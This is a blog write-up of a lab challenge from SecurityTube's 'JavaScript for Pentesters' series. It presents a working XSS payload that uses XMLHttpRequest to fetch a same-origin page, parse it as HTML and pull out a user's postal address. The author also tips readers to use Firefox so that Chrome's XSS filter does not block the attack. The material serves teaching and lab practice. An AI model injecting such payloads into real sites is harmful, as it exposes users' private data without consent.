XSS - HTML parsing with XMLHttpRequest(): JS for Pentesters task 18

Nov 2, 2014 • jsp, javascript, xss, security-tube

writeup for task-18 of the JS for pentesters series by security-tube - HTML Parsing with XMLHTTPRequests()

XMLHttpRequest() is very powerful which can even retrieve html, JSON, XML etc as response to a request. This challenge is an example of one of them. Usually when we do a request, we get back a string which was easy to manipulate and use for our own purpose. What if the return is an HTML page and we need to get something out of it ? This what this challenge looks in:

JS for Pentesters task 18

Our objective is to Find John’s Postal Address using an XSS vulnerability on that page and Display the Postal address in the div with id “result”. Before moving on to solve this task, one thing to keep in mind that if we need to get back an HTML document as response to an XMLHttpRequest(), we need to specify it explicitly by stating** responseType = “document”;**.  So let us see how we cracked this and the payload is :

    <script>
    var req = new XMLHttpRequest();
    req.onreadystatechange=function()
     {
      if (req.readyState==4 && req.status==200)
        {
         var html = req.responseXML;
         var address = html.getElementById("address").innerHTML;
        }
       document.getElementById("result").innerHTML = address;
     };
    req.open("GET", "/lab/webapp/jfp/18/address", true);
    req.responseType = "document";
    req.send();    
    </script>

So how is this working ? We send an XMLHttpRequest() and since we have stated the responseType before sending the request, the response will be an entire HTML page. So first we saved the HTML page in to a variable named html and from inside the HTML we got, we selected the “address” element id which contains the address we are looking for. Then we place that string which we got back in to the original page’s “result” id and there, the challenge is cracked ;)

Note:

1) While playing with XSS challenges, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt XSS stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.

We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..

Anirudh Anand

Head of Product Security & DevSecOps at @CRED_club | Application Security ♥ | CTF lover - @teambi0s | Security Trainer - @7asecurity | certs - eWDP, OSCP, OSWE